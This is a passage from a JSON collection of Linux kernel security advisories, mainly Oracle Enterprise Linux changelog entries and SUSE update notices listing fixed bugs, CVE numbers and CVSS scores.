[448869]\n- [autofs4] hold directory mutex if called in oz_mode (Ian Kent ) [458749]\n- [autofs4] use rehash list for lookups (Ian Kent ) [458749]\n- [autofs4] dont make expiring dentry negative (Ian Kent ) [458749]\n- [autofs4] fix mntput, dput order bug (Ian Kent ) [452139]\n- [autofs4] bad return from root.c:try_to_fill_dentry (Ian Kent ) [452139]\n- [autofs4] sparse warn in waitq.c:autofs4_expire_indirect (Ian Kent ) [452139]\n- [autofs4] check for invalid dentry in getpath (Ian Kent ) [452139]\n- [misc] create a kernel checksum file per FIPS140-2 (Don Zickus ) [444632]\n- [net] h323: Fix panic in conntrack module (Thomas Graf ) [433661]\n- [misc] NULL pointer dereference in kobject_get_path (Jiri Pirko ) [455460]\n- [audit] new filter type, AUDIT_FILETYPE (Alexander Viro ) [446707]\n- [ppc64] missed hw breakpoints across multiple threads (Brad Peters ) [444076]\n- [net] race between neigh_timer_handler and neigh_update (Brad Peters ) [440555]\n- [security] NULL ptr dereference in __vm_enough_memory (Jerome Marchand ) [443659]\n- [ppc64] cell: spufs update for RHEL-5.3 (Brad Peters ) [439483]\n- [misc] null pointer dereference in register_kretprobe (Jerome Marchand ) [452308]\n- [alsa] HDA: update to 2008-07-22 (Jaroslav Kysela ) [456215]\n- [ia64] xen: handle ipi case IA64_TIMER_VECTOR (Luming Yu ) [451745]\n- [misc] batch kprobe register/unregister (Jiri Pirko ) [437579]\n- [ia64] add gate.lds to Documentation/dontdiff (Prarit Bhargava ) [449948]\n- [xen] fix netloop restriction (Bill Burns ) [358281]\n- [nfs] revert to sync writes when background write errors (Jeff Layton ) [438423]\n- [ia64] kdump: implement greater than 4G mem restriction (Doug Chapman ) [446188]\n- [nfs] clean up short packet handling for NFSv4 readdir (Jeff Layton ) [428720]\n- [nfs] clean up short packet handling for NFSv2 readdir (Jeff Layton ) [428720]\n- [nfs] clean up short packet handling for NFSv3 readdir (Jeff Layton ) [428720]\n[2.6.18-105.el5]\n- [misc] pnp: increase number of devices (Prarit Bhargava ) [445590]\n- [ppc] PERR/SERR disabled after EEH error recovery (Brad Peters ) [457468]\n- [ppc] eHEA: update from version 0076-05 to 0091-00 (Brad Peters ) [442409]\n- [net] modifies inet_lro for RHEL (Brad Peters ) [442409]\n- [net] adds inet_lro module (Brad Peters ) [442409]\n- [ppc] adds crashdump shutdown hooks (Brad Peters ) [442409]\n- [ppc] xmon: setjmp/longjmp code generically available (Brad Peters ) [442409]\n- [xen] PV: config file changes (Don Dutile ) [442991]\n- [xen] PV: Makefile and Kconfig additions (Don Dutile ) [442991]\n- [xen] PV: add subsystem (Don Dutile ) [442991]\n- [xen] PV: shared used header file changes (Don Dutile ) [442991]\n- [xen] PV: shared use of xenbus, netfront, blkfront (Don Dutile ) [442991]\n- [fs] backport zero_user_segments and friends (Eric Sandeen ) [449668]\n- [fs] backport list_first_entry helper (Eric Sandeen ) [449668]\n- [ia64] fix boot failure on ia64/sn2 (Luming Yu ) [451745]\n- [ia64] move SAL_CACHE_FLUSH check later in boot (Luming Yu ) [451745]\n- [ia64] use platform_send_ipi in check_sal_cache_flush (Luming Yu ) [451745]\n- [xen] avoid dom0 hang when tearing down domains (Chris Lalancette ) [347161]\n- [xen] ia64: SMP-unsafe with XENMEM_add_to_physmap on HVM (Tetsu Yamamoto ) [457137]\n[2.6.18-104.el5]\n- [crypto] IPsec memory leak (Vitaly Mayatskikh ) [455238]\n- [ppc] edac: add support for Cell processor (Brad Peters ) [439507]\n- [ppc] edac: add pre-req support for Cell processor (Brad Peters ) [439507]\n- [scsi] DLPAR remove operation fails on LSI SCSI adapter (Brad Peters ) [457852]\n- [net] bridge: eliminate delay on carrier up (Herbert Xu ) [453526]\n- [mm] tmpfs: restore missing clear_highpage (Eugene Teo ) [426083]{CVE-2007-6417}\n- [scsi] aic94xx: update to 2.6.25 (Ed Pollard ) [439573]\n- [fs] dio: lock refcount operations (Jeff Moyer ) [455750]\n- [fs] vfs: fix lookup on deleted directory (Eugene Teo ) [457866]{CVE-2008-3275}\n- [fs] jbd: fix races that lead to EIO for O_DIRECT (Brad Peters ) [446599]\n- [fs] add percpu_counter_add & _sub (Eric Sandeen ) [443896]\n- [xen] event channel lock and barrier (Markus Armbruster ) [457086]\n- [ppc] adds DSCR support in sysfs (Brad Peters ) [439567]\n- [ppc] oprofile: wrong cpu_type returned (Brad Peters ) [441539]\n- [s390] utrace: PTRACE_POKEUSR_AREA corrupts ACR0 (Anton Arapov ) [431183]\n- [pci] fix problems with msi interrupt management (Michal Schmidt ) [428696]\n- [misc] fix wrong test in wait_task_stopped (Jerome Marchand ) [382211]\n- [fs] ecryptfs: use page_alloc to get a page of memory (Eric Sandeen ) [457058]\n- [misc] serial: fix break handling for i82571 over LAN (Aristeu Rozanski ) [440018]\n- [xen] blktap: expand for longer busids (Chris Lalancette ) [442723]\n- [xen] fix blkfront to accept > 16 devices (Chris Lalancette ) [442723]\n- [xen] expand SCSI majors in blkfront (Chris Lalancette ) [442077]\n- [misc] core dump: remain dumpable (Jerome Marchand ) [437958]\n- [fs] inotify: previous event should be last in list (Jeff Burke ) [453990]\n- [block] Enhanced Partition Statistics: documentation (Jerome Marchand ) [224322]\n- [block] Enhanced Partition Statistics: retain old stats (Jerome Marchand ) [224322]\n- [block] Enhanced Partition Statistics: procfs (Jerome Marchand ) [224322]\n- [block] Enhanced Partition Statistics: sysfs (Jerome Marchand ) [224322]\n- [block] Enhanced Partition Statistics: cpqarray fix (Jerome Marchand ) [224322]\n- [block] Enhanced Partition Statistics: cciss fix (Jerome Marchand ) [224322]\n- [block] Enhanced Partition Statistics: aoe fix (Jerome Marchand ) [224322]\n- [block] Enhanced Partition Statistics: update statistics (Jerome Marchand ) [224322]\n- [block] Enhanced Partition Statistics: core statistics (Jerome Marchand ) [224322]\n- [fs] add clear_nlink, drop_nlink (Eric Sandeen ) [443896]\n- [fs] add buffer_submit_read and bh_uptodate_or_lock (Eric Sandeen ) [443896]\n- [fs] noinline_for_stack attribute (Eric Sandeen ) [443896]\n- [fs] i_version updates (Eric Sandeen ) [443896]\n- [fs] add an ERR_CAST function (Eric Sandeen ) [443896]\n- [fs] introduce is_owner_or_cap (Eric Sandeen ) [443896]\n- [fs] add generic_find_next_le_bit (Eric Sandeen ) [443896]\n- [fs] add le32_add_cpu and friends (Eric Sandeen ) [443896]\n- [net] sctp: export needed data to implement RFC 3873 (Neil Horman ) [277111]\n- [xen] x86: xenoprof enable additional perf counters (Markus Armbruster ) [426096]\n[2.6.18-103.el5]\n- [fs] dio: use kzalloc to zero out struct dio (Jeff Moyer ) [439918]\n- [x86] hugetlb: inconsistent get_user_pages (x86 piece) (Brad Peters ) [456449]\n- [fs] fix softlockups when repeatedly dropping caches (Bryn M. Reeves ) [444961]\n- [char] add hp-ilo driver (Tony Camuso ) [437212]\n- [net] do liberal tracking for picked up connections (Anton Arapov ) [448328]\n- [scsi] BusLogic: typedef bool to boolean for compiler (Chip Coldwell ) [445095]\n- [misc] ioc4: fixes - pci_put_dev, printks, mem resource (Jonathan Lim ) [442424]\n[2.6.18-102.el5]\n- [net] slow_start_after_idle influences cwnd validation (Thomas Graf ) [448918]\n- [dlm] fix a couple of races (David Teigland ) [457569]\n- [net] NetXen driver update to 3.4.18 (Ed Pollard ) [443619]\n- [mm] NUMA: system is slow when over-committing memory (Larry Woodman ) [457264]\n- [net] ixgbe: remove device ID for unsupported device (Andy Gospodarek ) [454910]\n- [ppc] Event Queue overflow on eHCA adapters (Brad Peters ) [446713]\n- [ppc] IOMMU Performance Enhancements (Brad Peters ) [439469]\n- [ppc] RAS update for Cell (Brad Peters ) [313731]\n- [ppc] fast little endian implementation for System p AVE (Brad Peters ) [439505]\n- [net] proc: add unresolved discards stat to ndisc_cache (Neil Horman ) [456732]\n- [x86_64] ia32: increase stack size (Larry Woodman ) [442331]\n- [mm] fix PAE pmd_bad bootup warning (Larry Woodman ) [455434]\n- [video] add uvcvideo module (Jay Fenlason ) [439899]\n- [crypto] add tests for cipher types to self test module (Neil Horman ) [446514]\n- [mm] fix debug printks in page_remove_rmap() (Larry Woodman ) [457458]\n- [mm] fix /proc/sys/vm/lowmem_reserve_ratio (Larry Woodman ) [457471]\n- [xen] add VPS sync read/write according to spec (Bill Burns ) [437096]\n- [xen] use VPS service to take place of PAL call (Bill Burns ) [437096]\n- [xen] enable serial console for new ia64 chip (Bill Burns ) [437096]\n[2.6.18-101.el5]\n- [ipmi] restrict keyboard I/O port reservation (peterm@redhat.com ) [456300]\n- [mm] xpmem: inhibit page swapping under heavy mem use (George Beshers ) [456574]\n- [fs] vfs: wrong error code on interrupted close syscalls (Jeff Layton ) [455729]\n- [misc] dont randomize when no randomize personality set (Bryn M. Reeves ) [444611]\n- [ia64] holdoffs in sn_ack_irq when running latency tests (Jonathan Lim ) [447838]\n- [xen] x86: new vcpu_op call to get physical CPU identity (Bhavana Nagendra ) [434548]\n- [xen] HV: memory corruption with large number of cpus (Chris Lalancette ) [449945]\n- [xen] save phys addr for crash utility (Bill Burns ) [443618]\n- [xen] kexec: allocate correct memory reservation (Bill Burns ) [442661]\n[2.6.18-100.el5]\n- [gfs2] glock dumping missing out some glocks (Steven Whitehouse ) [456334]\n- [scsi] ibmvscsi: add tape device support (Brad Peters ) [439488]\n- [misc] irq: reset stats when installing new handler (Eugene Teo ) [456218]\n- [scsi] ibmvscsi: latest 5.3 fixes and enhancements (Brad Peters ) [439487]\n- [selinux] prevent illegal selinux options when mounting (Eugene Teo ) [456052]\n- [xen] remove blktap sysfs entries before shutdown (Chris Lalancette ) [250104]\n- [xen] dont collide symbols with blktap (Chris Lalancette ) [250104]\n- [xen] blktap: modify sysfs entries to match blkback (Chris Lalancette ) [250104]\n- [xen] dont try to recreate sysfs entries (Chris Lalancette ) [250104]\n- [xen] blktap: stats error cleanup (Chris Lalancette ) [250104]\n- [xen] blktap: add statistics (Chris Lalancette ) [250104]\n- [xen] rename blktap kernel threads to blktap.dom.blkname (Chris Lalancette ) [250104]\n- [ia64] xen: incompatibility with HV and userspace tools (Tetsu Yamamoto ) [444589]\n- [usb] add ids for WWAN cards (John Feeney ) [253137]\n- [ia64] handle invalid ACPI SLIT table (Luming Yu ) [451591]\n- [pci] mmconfig: use conf1 for access below 256 bytes (Tony Camuso ) [441615 251493]\n- [pci] mmconfig: rm pci_legacy_ops and nommconf blacklist (Tony Camuso ) [441615 251493]\n- [pci] mmconfig: remove pci_bios_fix_bus_scan_quirk (Tony Camuso ) [441615 251493]\n- [fs] nlm: tear down RPC clients in nlm_shutdown_hosts (Jeff Layton ) [254195]\n- [fs] nlm: dont reattempt GRANT_MSG with an inflight RPC (Jeff Layton ) [254195]\n- [fs] nlm: canceled inflight GRANT_MSG shouldnt requeue (Jeff Layton ) [254195]\n- [fs] potential race in mark_buffer_dirty (Mikulas Patocka ) [442577]\n[2.6.18-99.el5]\n- [fs] lockd: nlmsvc_lookup_host called with f_sema held (Jeff Layton ) [453094]\n- [x86] dont call MP_processor_info for disabled cpu (Prarit Bhargava ) [455425]\n- [x86_64] dont call MP_processor_info for disabled cpu (Prarit Bhargava ) [455427]\n- [x86] show apicid in /proc/cpuinfo (Prarit Bhargava ) [455424]\n- [acpi] disable lapic timer on C2 states (John Villalovos ) [438409]\n- [acpi] enable deep C states for idle efficiency (Matthew Garrett ) [443516]\n- [fs] missing check before setting mount propagation (Eugene Teo ) [454393]\n- [xen] pvfb: frontend mouse wheel support (Markus Armbruster ) [446235]\n- [ppc] use ibm,slb-size from device tree (Brad Peters ) [432127]\n- [mm] dio: fix cache invalidation after sync writes (Jeff Moyer ) [445674]\n- [misc] fix UP compile in skcipher.h (Prarit Bhargava ) [453038]\n- [ia64] softlock: prevent endless warnings in kdump (Neil Horman ) [453200]\n- [net] s2io: fix documentation about intr_type (Michal Schmidt ) [450921]\n- [net] make udp_encap_rcv use pskb_may_pull (Neil Horman ) [350281]\n- [misc] fix compile when selinux is disabled (Prarit Bhargava ) [452535]\n- [scsi] update aacraid to 1.1.5-2455 (Chip Coldwell ) [429862]\n- [x86_64] ptrace: sign-extend orig_rax to 64 bits (Jerome Marchand ) [437882]\n- [x86_64] ia32 syscall restart fix (Jerome Marchand ) [434998]\n- [misc] optimize byte-swapping, fix -pedantic compile (Jarod Wilson ) [235699]\n- [dm] snapshot: reduce default memory allocation (Milan Broz ) [436494]\n- [dm] snapshot: fix chunksize sector conversion (Milan Broz ) [443627]\n- [net] ip tunnel cant be bound to another device (Michal Schmidt ) [451196]\n- [net] bnx2x: chip reset and port type fixes (Andy Gospodarek ) [441259]\n- [audit] records sender of SIGUSR2 for userspace (Eric Paris ) [428277]\n- [audit] deadlock under load and auditd takes a signal (Eric Paris ) [429941]\n- [audit] send EOE audit record at end of syslog events (Eric Paris ) [428275]\n- [x86] brk: fix RLIMIT_DATA check (Vitaly Mayatskikh ) [315681]\n- [misc] fix ?!/!? inversions in spec file (Jarod Wilson ) [451008]\n- [scsi] fix high I/O wait using 3w-9xxx (Tomas Henzl ) [444759]\n- [net] ipv6: fix unbalanced ref count in ndisc_recv_ns (Neil Horman ) [450855]\n- [fs] cifs: wait on kthread_stop before thread exits (Jeff Layton ) [444865]\n- [net] fix the redirected packet if jiffies wraps (Ivan Vecera ) [445536]\n- [nfs] pages of a memory mapped file get corrupted (Peter Staubach ) [435291]\n- [net] sunrpc: memory corruption from dead rpc client (Jeff Layton ) [432867]\n- [fs] debugfs: fix dentry reference count bug (Josef Bacik ) [445787]\n- [acpi] remove processor module errors (John Feeney ) [228836]\n- [fs] ext3: make fdatasync not sync metadata (Josef Bacik ) [445649]\n- [pci] acpiphp_ibm: let ACPI determine _CID buffer size (Prarit Bhargava ) [428874]\n- [fs] need process map reporting for swapped pages (Anton Arapov ) [443749]\n- [misc] optional panic on softlockup warnings (Prarit Bhargava ) [445422]\n- [net] sctp: support remote address table oid (Neil Horman ) [435110]\n- [nfs] knfsd: revoke setuid/setgid when uid/gid changes (Jeff Layton ) [443043]\n- [nfs] remove error field from nfs_readdir_descriptor_t (Jeff Layton ) [437479]\n[2.6.18-98.el5]\n- [nfs] sunrpc: sleeping rpc_malloc might deadlock (Jeff Layton ) [451317]\n- [gfs2] initial write performance very slow (Benjamin Marzinski ) [432826]\n- [ia64] avoid unnecessary TLB flushes when allocating mem (Doug Chapman ) [435362]\n- [gfs2] lock_dlm: deliver callbacks in the right order (Bob Peterson ) [447748]\n- [sound] alsa: HDA driver update from upstream 2008-06-11 (Jaroslav Kysela ) [451007]\n- [x86_64] xen: fix syscall return when tracing (Chris Lalancette ) [453394]\n- [fs] ext3: lighten up resize transaction requirements (Eric Sandeen ) [425955]\n- [xen] PVFB probe & suspend fixes (Markus Armbruster ) [434800]\n- [nfs] ensure that options turn off attribute caching (Peter Staubach ) [450184]\n- [x86_64] memmap flag results in bogus RAM map output (Prarit Bhargava ) [450244]\n- [nfs] sunrpc: fix a race in rpciod_down (Jeff Layton ) [448754]\n- [nfs] sunrpc: fix hang due to eventd deadlock (Jeff Layton ) [448754]\n- [gfs2] d_doio stuck in readv waiting for pagelock (Bob Peterson ) [432057]\n- [fs] ext3: fix lock inversion in direct io (Josef Bacik ) [439194]\n- [fs] jbd: fix journal overflow issues (Josef Bacik ) [439193]\n- [fs] jbd: fix typo in recovery code (Josef Bacik ) [447742]\n- [openib] small ipoib packet can cause an oops (Doug Ledford ) [445731]\n- [sched] domain range turnable params for wakeup_idle (Kei Tokunaga ) [426971]\n- [edac] k8_edac: fix typo in user visible message (Aristeu Rozanski ) [446068]\n- [net] ipv6: dont handle default routes specially (Neil Horman ) [426895 243526]\n- [fs] ext3: unmount hang when quota-enabled goes error-RO (Eric Sandeen ) [429054]\n- [net] ipv6: no addrconf for bonding slaves (Andy Gospodarek ) [236750]\n- [misc] fix race in switch_uid and user signal accounting (Vince Worthington ) [441762 440830]\n- [misc] /proc/pid/limits : fix duplicate array entries (Neil Horman ) [443522]\n- [nfs] v4: fix ref count and signal for callback thread (Jeff Layton ) [423521]\n- [mm] do not limit locked memory when using RLIM_INFINITY (Larry Woodman ) [442426]\n- [xen] ia64: add srlz instruction to asm (Aron Griffis ) [440261]\n- [nfs] fix transposed deltas in nfs v3 (Jeff Layton ) [437544]\n- [x86_64] gettimeofday fixes for HPET, PMTimer, TSC (Prarit Bhargava ) [250708]\n- [ia64] remove assembler warnings on head.S (Luming Yu ) [438230]\n- [misc] allow hugepage allocation to use most of memory (Larry Woodman ) [438889]\n- [edac] k8_edac: add option to report GART errors (Aristeu Rozanski ) [390601]\n- [ia64] add TIF_RESTORE_SIGMASK and pselect/ppoll syscall (Luming Yu ) [206806]\n[2.6.18-97.el5]\n- [misc] signaling msgrvc() should not pass back error (Jiri Pirko ) [452533]\n- [ia64] properly unregister legacy interrupts (Prarit Bhargava ) [445886]\n- [s390] zfcp: status read locking race (Hans-Joachim Picht ) [451278]\n- [s390] fix race with stack local wait_queue_head_t. (Hans-Joachim Picht ) [451279]\n- [s390] cio: fix system hang with reserved DASD (Hans-Joachim Picht ) [451222]\n- [s390] cio: fix unusable zfcp device after vary off/on (Hans-Joachim Picht ) [451223]\n- [s390] cio: I/O error after cable pulls (Hans-Joachim Picht ) [451281]\n- [s390] tape: race condition in tape block device driver (Hans-Joachim Picht ) [451277]\n- [gfs2] cannot use fifo nodes (Steven Whitehouse ) [450276]\n- [gfs2] bad subtraction in while-loop can cause panic (Bob Peterson ) [452004]\n- [tux] crashes kernel under high load (Anton Arapov ) [448973]\n- [dlm] move plock code from gfs2 (David Teigland ) [450138]\n- [dlm] fix basts for granted CW waiting PR/CW (David Teigland ) [450137]\n- [dlm] check for null in device_write (David Teigland ) [450136]\n- [dlm] save master info after failed no-queue request (David Teigland ) [450135]\n- [dlm] keep cached master rsbs during recovery (David Teigland ) [450133]\n- [dlm] change error message to debug (David Teigland ) [450132]\n- [dlm] fix possible use-after-free (David Teigland ) [450132]\n- [dlm] limit dir lookup loop (David Teigland ) [450132]\n- [dlm] reject normal unlock when lock waits on lookup (David Teigland ) [450132]\n- [dlm] validate messages before processing (David Teigland ) [450132]\n- [dlm] reject messages from non-members (David Teigland ) [450132]\n- [dlm] call to confirm_master in receive_request_reply (David Teigland ) [450132]\n- [dlm] recover locks waiting for overlap replies (David Teigland ) [450132]\n- [dlm] clear ast_type when removing from astqueue (David Teigland ) [450132]\n- [dlm] use fixed errno values in messages (David Teigland ) [450130]\n- [dlm] swap bytes for rcom lock reply (David Teigland ) [450130]\n- [dlm] align midcomms message buffer (David Teigland ) [450130]\n- [dlm] use dlm prefix on alloc and free functions (David Teigland ) [450130]\n- [s390] zfcp: memory handling for GID_PN (Hans-Joachim Picht ) [447727]\n- [s390] zfcp: out-of-memory handling for status_read req (Hans-Joachim Picht ) [447726]\n- [s390] zfcp: deadlock in slave_destroy handler (Hans-Joachim Picht ) [447329]\n- [s390] dasd: fix timeout handling in interrupt handler (Hans-Joachim Picht ) [447316]\n- [s390] zfcp: fix check for handles in abort handler (Hans-Joachim Picht ) [447331]\n- [s390] aes_s390 decrypt may produce wrong results in CBC (Hans-Joachim Picht ) [446191]\n- [s390x] CPU Node Affinity (Hans-Joachim Picht ) [447379]\n- [gfs2] inode indirect buffer corruption (Bob Peterson ) [345401]\n- [s390] cio: avoid machine check vs. not operational race (Hans-Joachim Picht ) [444082]\n- [s390] qeth: avoid inconsistent lock state for inet6_dev (Hans-Joachim Picht ) [444077]\n- [s390] qdio: missed inb. traffic with online FCP devices (Hans-Joachim Picht ) [444146]\n- [s390] qeth: eddp skb buff problem running EDDP guestlan (Hans-Joachim Picht ) [444014]\n- [s390] cio: kernel panic in cm_enable processing (Hans-Joachim Picht ) [442032]\n- [fs] fix bad unlock_page in pip_to_file() error path (Larry Woodman ) [439917]\n- [s390] zfcp: Enhanced Trace Facility (Hans-Joachim Picht ) [439482]\n- [s390] dasd: add support for system information messages (Hans-Joachim Picht ) [439441]\n- [s390] zcrypt: add support for large random numbers (Hans-Joachim Picht ) [439440]\n- [s390] qeth: recovery problems with failing STARTLAN (Hans-Joachim Picht ) [440420]\n- [s390] qdio: change in timeout handling during establish (Hans-Joachim Picht ) [440421]\n- [s390] lcs: ccl-seq. numbers required for prot. 802.2 (Hans-Joachim Picht ) [440416]\n- [s390] dasd: diff z/VM minidisks need a unique UID (Hans-Joachim Picht ) [440402]\n- [s390] qeth: ccl-seq. numbers req for protocol 802.2 (Hans-Joachim Picht ) [440227]\n- [s390] sclp: prevent console lockup during SE warmstart (Hans-Joachim Picht ) [436967]\n- [s390] zcrypt: disable ap polling thread per default (Hans-Joachim Picht ) [435161]\n- [s390] zfcp: hold lock on port/unit handle for task cmd (Hans-Joachim Picht ) [434959]\n- [s390] zfcp: hold lock on port handle for ELS command (Hans-Joachim Picht ) [434955]\n- [s390] zfcp: hold lock on port/unit handle for FCP cmd (Hans-Joachim Picht ) [433537]\n- [s390] zfcp: hold lock when checking port/unit handle (Hans-Joachim Picht ) [434953]\n- [s390] zfcp: handling of boxed port after physical close (Hans-Joachim Picht ) [434801]\n- [s390] dasd: fix ifcc handling (Hans-Joachim Picht ) [431592]\n- [s390] cio: introduce timed recovery procedure (Hans-Joachim Picht ) [430593]\n- [s390] cio: sense id works with partial hw response (Hans-Joachim Picht ) [430787]\n- [s390] zfcp: fix use after free bug (Hans-Joachim Picht ) [412881]\n- [s390] cio: add missing reprobe loop end statement (Hans-Joachim Picht ) [412891]\n- [s390] zfcp: imbalance in erp_ready_sem usage (Hans-Joachim Picht ) [412831]\n- [s390] zfcp: zfcp_erp_action_dismiss will ignore actions (Hans-Joachim Picht ) [409091]\n- [s390] zfcp: Units are reported as BOXED (Hans-Joachim Picht ) [412851]\n- [s390] zfcp: Reduce flood on hba trace (Hans-Joachim Picht ) [415951]\n- [s390] zfcp: Deadlock when adding invalid LUN (Hans-Joachim Picht ) [412841]\n- [s390] pav alias disks not detected on lpar (Hans-Joachim Picht ) [416081]\n[2.6.18-96.el5]\n- [net] randomize udp port allocation (Eugene Teo ) [454572]\n- [tty] add NULL pointer checks (Aristeu Rozanski ) [453154]\n- [misc] ttyS1 lost interrupt, stops transmitting v2 (Brian Maly ) [451157]\n- [net] sctp: make sure sctp_addr does not overflow (David S. Miller ) [452483]\n- [sys] sys_setrlimit: prevent setting RLIMIT_CPU to 0 (Neil Horman ) [437122]\n- [net] sit: exploitable remote memory leak (Jiri Pirko ) [446039]\n- [x86_64] zero the output of string inst on exception (Jiri Pirko ) [451276] {CVE-2008-2729}\n- [net] dccp: sanity check feature length (Anton Arapov ) [447396] {CVE-2008-2358}\n- [misc] buffer overflow in ASN.1 parsing routines (Anton Arapov ) [444465] {CVE-2008-1673}\n- [x86_64] write system call vulnerability (Anton Arapov ) [433945] {CVE-2008-0598}\n[2.6.18-95.el5]\n- [net] Fixing bonding rtnl_lock screwups (Fabio Olive Leite ) [450219]\n- [x86_64]: extend MCE banks support for Dunnington, Nehalem (Prarit Bhargava ) [446673]\n- [nfs] address nfs rewrite performance regression in RHEL5 (Eric Sandeen ) [436004]\n- [mm] Make mmap() with PROT_WRITE on RHEL5 (Larry Woodman ) [448978]\n- [i386]: Add check for supported_cpus in powernow_k8 driver (Prarit Bhargava ) [443853]\n- [i386]: Add check for dmi_data in powernow_k8 driver (Prarit Bhargava ) [443853]\n- [sata] update sata_svw (John Feeney ) [441799]\n- [net] fix recv return zero (Thomas Graf ) [435657]\n- [misc] kernel crashes on futex (Anton Arapov ) [435178]\n[2.6.18-94.el5]\n- [misc] ttyS1 loses interrupt and stops transmitting (Simon McGrath ) [440121]\n[2.6.18-93.el5]\n- [x86] sanity checking for read_tsc on i386 (Brian Maly ) [443435]\n- [xen] netfront: send fake arp when link gets carrier (Herbert Xu ) [441716]\n- [net] fix xfrm reverse flow lookup for icmp6 (Neil Horman ) [446250]\n- [net] negotiate all algorithms when id bit mask zero (Neil Horman ) [442820]\n- [net] 32/64 bit compat MCAST_ sock options support (Neil Horman ) [444582]\n- [misc] add CPU hotplug support for relay functions (Kei Tokunaga ) [441523]", "edition": 72, "modified": "2009-01-27T00:00:00", "published": "2009-01-27T00:00:00", "id": "ELSA-2009-0225", "href": "http://linux.oracle.com/errata/ELSA-2009-0225.html", "title": "Oracle Enterprise Linux 5.3 kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6282", "CVE-2008-1669", "CVE-2005-0504", "CVE-2008-1375", "CVE-2008-1615", "CVE-2008-0007"], "description": "[2.6.9-67.0.15.0.1.EL]\n- fix skb alignment that was causing sendto() to fail with EFAULT (Olaf Kirch) [orabug 6845794]\n- fix entropy flag in bnx2 driver to generate entropy pool (John Sobecki) [orabug 5931647]\n- fix enomem due to larger mtu size page alloc (Zach Brown) [orabug 5486128]\n- fix per_cpu() api bug_on with rds (Zach Brown) [orabug 5760648]\n- remove patch sysrq-b that queues upto keventd thread [orabug 6125546]\n- allow more than 4GB hugepage for single user (Herbert van den Bergh) [orabug 6002738]\n- netrx/netpoll race avoidance (Tina Yang) [orabug 6143381]\n[2.6.9-67.0.15]\n-fix kabi breakage in 67.0.14\n[2.6.9-67.0.14]\n-fs: serialize file access for dnotify (Alexander Viro) [443437] {CVE-2008-1669}\n-update: fix race condition in dnotify (Alexander Viro) [439756] {CVE-2008-1375}\n[2.6.9-67.0.13]\n-Revert: Add HP DL580 G5 to bfsort whitelist (Tony Camuso) [437976]\n[2.6.9-67.0.12]\n-fs: fix race condition in dnotify (Alexander Viro) [439756] {CVE-2008-1375}\n[2.6.9-67.0.11]\n-nfs: High vm pagecache reclaim latency on systems with large highmem to lowmem ratio fix (Larry Woodman) [438345]\n-nfs: Fix nfs read performance regression. Introduce a new tunable (Larry Woodman) [438477]\n-Retry: check to see if agp is valid before reporting aperture size warnings (Brian Maly) [392771 431897]\n-Ensure IV is in linear part of the skb to avoid BUG due to OOB access (Thomas Graf) [427245] {CVE-2007-6282}\n-fix unprivileged crash on x86_64 cs corruption (Jarod Wilson) [439786] {CVE-2008-1615}\n[2.6.9-67.0.10]\n-update: do not return zero in mmap (Vitaly Mayatskikh) [400811]\n-neofb: avoid overwriting fb_info fields (Vitaly Mayatskikh) [430251]\n-[NET] link_watch: always schedule urgent events (Don Dutile) [436102]\n-nlm: fix a client side race on blocking locks (Jeff Layton) [436129]\n-nlm: cleanup for blocked locks (Jeff Layton) [436129]\n-Add HP DL580 G5 to bfsort whitelist (Tony Camuso) [437976]\n-nfs: Discard pagecache data for dirs on denty_iput (Jeff Layton) [437788]\n[2.6.9-67.0.9]\n-[NET] link_watch: handle jiffies wraparound (Vince Worthington) [436749]\n-libata: un-blacklist hitachi drives to enable NCQ (David Milburn) [436499]\n-libata: sata_nv may send commands with duplicate tags (David Milburn) [436499]\n[2.6.9-67.0.8]\n-Insufficient range checks in fault handlers with mremap (Vitaly Mayatskikh) [428968] {CVE-2008-0007}\n-[MOXA] buffer overflow in moxa driver (Vitaly Mayatskikh) [423131] {CVE-2005-0504}\n-Fix unix stream socket recv race condition (Hideo AOKI) [435122]", "edition": 4, "modified": "2008-05-07T00:00:00", "published": "2008-05-07T00:00:00", "id": "ELSA-2008-0237", "href": "http://linux.oracle.com/errata/ELSA-2008-0237.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:06:22", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3272", "CVE-2008-0598", "CVE-2008-3275", "CVE-2008-1673"], "description": "This kernel security update for SUSE Linux Enterprise 10 Service Pack 2 fixes lots of bugs and some security issues:\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2008-10-01T17:25:47", "published": "2008-10-01T17:25:47", "id": "SUSE-SA:2008:048", "href": "http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00001.html", "title": "remote denial of service in kernel", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:13:25", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3272", "CVE-2008-0598", "CVE-2008-3525", "CVE-2007-6716", "CVE-2008-2812", "CVE-2008-1673"], "description": "The Linux kernel in the SUSE Linux Enterprise Server 9 Service Pack 4 was released to fix various bugs and also some security problems:\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2008-10-01T15:09:37", "published": "2008-10-01T15:09:37", "id": "SUSE-SA:2008:047", "href": "http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00000.html", "type": "suse", "title": "remote denial of service in kernel", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:19:06", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3272", "CVE-2008-0598", "CVE-2008-3525", "CVE-2008-2931", "CVE-2008-3275", "CVE-2008-2812", "CVE-2008-1673"], "description": "The SUSE Linux Enterprise 10 Service Pack 1 kernel was updated to fix lots of bugs and also contains several security fixes: CVE-2008-3525: Added missing capability checks in sbni_ioctl(). CVE-2008-0598: On AMD64 some string operations could leak kernel information into userspace. CVE-2008-1673: Added range checking in ASN.1 handling for the CIFS and SNMP NAT netfilter modules. CVE-2008-3272: Fixed range checking in the snd_seq OSS ioctl, which could be used to leak information from the kernel. CVE-2008-3275: Fixed a memory leak when looking up deleted directories which could be used to run the system out of memory. CVE-2008-2931: The do_change_type function in 